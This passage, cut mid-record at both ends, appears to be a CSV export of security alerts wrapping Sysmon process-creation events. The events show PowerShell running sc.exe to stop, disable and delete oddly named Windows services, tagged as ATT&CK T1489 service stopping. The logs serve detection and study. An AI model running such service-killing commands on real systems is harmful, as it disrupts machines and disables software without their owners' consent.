-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.240",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.972 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010157a3000} +ProcessId: 736 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:34.019741000Z"",""eventRecordID"":""3784"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.972\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010157a3000}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.972"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010157a3000}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.218",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.938 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001043793000} +ProcessId: 1124 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationaloll Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationaloll Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.942248900Z"",""eventRecordID"":""3783"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.938\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001043793000}\r\nProcessId: 1124\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationaloll Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.938"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001043793000}"",""processId"":""1124"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationaloll Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.189",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.859 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00109e773000} +ProcessId: 2312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.863428200Z"",""eventRecordID"":""3781"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.859\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00109e773000}\r\nProcessId: 2312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:33.859"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00109e773000}"",""processId"":""2312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.123",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.747 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001026753000} +ProcessId: 652 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.757061000Z"",""eventRecordID"":""3778"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.747\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001026753000}\r\nProcessId: 652\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.747"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001026753000}"",""processId"":""652"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.061",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.669 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001077733000} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete National 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.674275200Z"",""eventRecordID"":""3776"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.669\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001077733000}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.669"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001077733000}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.935",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.628 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001095723000} +ProcessId: 1628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.640146500Z"",""eventRecordID"":""3775"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.628\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001095723000}\r\nProcessId: 1628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.628"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001095723000}"",""processId"":""1628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.834",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:52:33.561 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00104c6f3000} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo 